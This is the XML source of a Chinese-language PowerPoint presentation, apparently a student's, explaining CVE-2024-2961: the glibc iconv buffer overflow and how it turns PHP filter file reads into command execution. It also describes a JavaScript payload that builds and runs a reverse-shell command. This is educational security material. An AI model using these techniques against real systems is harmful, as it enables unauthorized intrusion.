                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>();)]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其中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$..[?()]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为</a:t>
            </a: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JSONPath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语法，匹配根元素下所有内容，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[?()]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中为过滤条件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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JS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语句内容为定义 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p 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为调用方法执行连接远程主机命令（即反弹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shell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）的字符串，然后通过构造函数生成函数（</a:t>
            </a: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ddd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），最后调用该方法执行命令。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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408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73D5E-221C-0397-0C92-A83ED9795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98F7D77-7932-011A-91F5-C6F4F891A22E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5229225" y="3602355"/>
            <a:ext cx="2417915" cy="43088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lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent2">
                        <a:alpha val="20000"/>
                      </a:schemeClr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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent2">
                        <a:alpha val="20000"/>
                      </a:schemeClr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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent2">
                        <a:alpha val="20000"/>
                      </a:schemeClr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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:rPr>
              <a:t>RCE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16078B-9BA9-CE5B-2446-3ED1204E6C5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5300980" y="2783840"/>
            <a:ext cx="4378325" cy="61555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4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  <a:latin typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:rPr>
              <a:t>CVE-2024-2961</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="40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effectLst>
                <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="0B184D">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              <a:ea typeface="优设标题黑" panose="00000500000000000000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F67F37F-80E7-ACC6-0649-E259019A73C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8599805" y="3408045"/>
            <a:ext cx="1079500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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</a:gradFill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941D2ACD-5DDB-A807-1715-794633F8EC25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3398520" y="2874010"/>
            <a:ext cx="1814830" cy="1157605"/>
            <a:chOff x="3398520" y="2874010"/>
            <a:chExt cx="1814830" cy="1157605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DCDAA5AD-8273-7DF7-D116-1A3DC28769D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3398520" y="2874010"/>
              <a:ext cx="1814830" cy="1157605"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 29964"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="accent3">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent2">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="14280000" scaled="0"/>
            </a:gra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en-US" altLang="zh-CN" sz="1200" i="1">
                <a:effectLst>
                  <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                    <a:srgbClr val="0B184D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789B229-BED9-0DD4-90F6-1B42DE06CBEE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3642602" y="2991147"/>
              <a:ext cx="1131720" cy="923330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 anchorCtr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sz="6000" i="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  <a:effectLst>
                    <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="0B184D">
                        <a:alpha val="40000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
                  <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p: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C53181A-6EF0-16CE-D740-43A4E338330F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3684905" y="2665730"/>
            <a:ext cx="2249805" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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</a:gradFill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42AB6D4-15C9-4D2E-4277-44689FC98879}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3311525" y="4258310"/>
            <a:ext cx="4192905" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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</a:gradFill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E17845A-7D2C-A4CB-EB11-A8914374A6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788" y="701902"/>
            <a:ext cx="2727098" cy="253980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altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2023211561 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>窦子涵</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2917775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05A7-A6A6-5C77-B4E3-E48E0B3C6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3C86F36-30AD-8E21-6B1E-9A4E6581A8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788" y="701902"/>
            <a:ext cx="2727098" cy="253980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altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>CVE-2024-2961</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0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A150609D-FCA1-CEFD-1E2E-35241608EFA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="1386640"/>
            <a:ext cx="366963" cy="366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19045" tIns="19045" rIns="19045" bIns="19045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5082F9-8C6D-6797-CCFA-9E55213AB697}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1127034" y="1185400"/>
            <a:ext cx="2448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漏洞描述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0EF92C-4DDB-2301-096B-EF2B0722E917}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674228" y="1902832"/>
            <a:ext cx="4806156" cy="245342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GNU C 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库 （也就是</a:t>
            </a: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glibc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）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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2.39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及更早版本中的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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iconv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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() 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函数在将字符串转换为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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ISO-2022-CN-EXT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字符集时，可能会使传递给它的输出缓冲区溢出最多 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4 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个字节，这可能会导致应用程序崩溃或覆盖相邻变量。利用方式为将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PHP-filter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的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>任意文件读取升级为任意命令执行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A03F7C2-EE84-674D-D57C-E86358B27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773" y="1293395"/>
            <a:ext cx="5830839" cy="50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85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A25C5-1495-84D4-DD19-A914A19C5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FCA0B6FB-A449-C543-AD26-9FA622282E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788" y="701902"/>
            <a:ext cx="2727098" cy="253980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altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>CVE-2024-2961</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0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EAD9FED4-9FB0-7D1E-4D2C-49A3501AA684}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674228" y="1394254"/>
            <a:ext cx="366963" cy="366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19045" tIns="19045" rIns="19045" bIns="19045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1D418DE-D02D-88E4-27FC-ACC23854789B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088474" y="1193014"/>
            <a:ext cx="251544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基础知识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79696BA0-DA5F-DA24-25DA-1B0D6AA118A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674228" y="1965063"/>
            <a:ext cx="10843544" cy="4530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PHP-filter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PHP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过滤器，本漏洞利用的是</a:t>
            </a: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convert.iconv.X.Y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（作用是将字符集从 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X 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转换为 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Y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）。处理字符串时，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PHP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首先会获取流（即读取资源）。它将流存储在一系列桶中，这些桶是双向链接的结构，每个桶包含一定大小的缓冲区。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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HTTP-Chunked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：一种非常简单的编码方式，它通过数据块（非堆内存块）发送数据。首先，发送一个以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ASCII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十六进制表示的大小，紧接着是一个换行符，然后是相应大小的数据块，再接一个换行符，以此类推，并通过发送大小为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的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chunk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来指示数据的结束。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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PHP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堆：在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PHP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中进行内存分配时，使用</a:t>
            </a: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emalloc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(N)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函数，其中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N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是希望分配的字节数。返回的结果是一个指向能够存储至少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N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字节的内存块（即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chunk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）的指针。当完成对这块内存的使用后，通过调用</a:t>
            </a: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efree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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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ptr</a:t>
            </a:r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来释放它。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7874357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GRiOTQzZmU2MzNhMmVmYzI5NDQ4YTk0NTBiZDAzNmEifQ=="/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="青蓝色深色模板">
  <a:themeElements>
    <a:clrScheme name="青蓝色-微渐变">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="222A35"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="DBEFF9"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="0ED0A9"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="45C4DA"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="21CFBA"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="000000"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FFFFFF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="7F7F7F"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="F49100"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="85DFD0"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="自定义 1">
      <a:majorFont>
        <a:latin typeface="OPPOSans B"/>
        <a:ea typeface="OPPOSans B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t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1325</TotalTime>
  <Words>1395</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>66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优设标题黑</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>华文宋体</vt:lpstr>
      <vt:lpstr>OPPOSans H</vt:lpstr>
      <vt:lpstr>OPPOSans L</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>青蓝色深色模板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Kwok Siu Cheng</dc:creator>
  <cp:lastModifiedBy>子涵 窦</cp:lastModifiedBy>
  <cp:revision>86</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-06T09:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-19T08:20:04Z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28F27B3B539C463784D107D655EDA596</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.10356</vt:lpwstr>
  </property>
</Properties>
</file>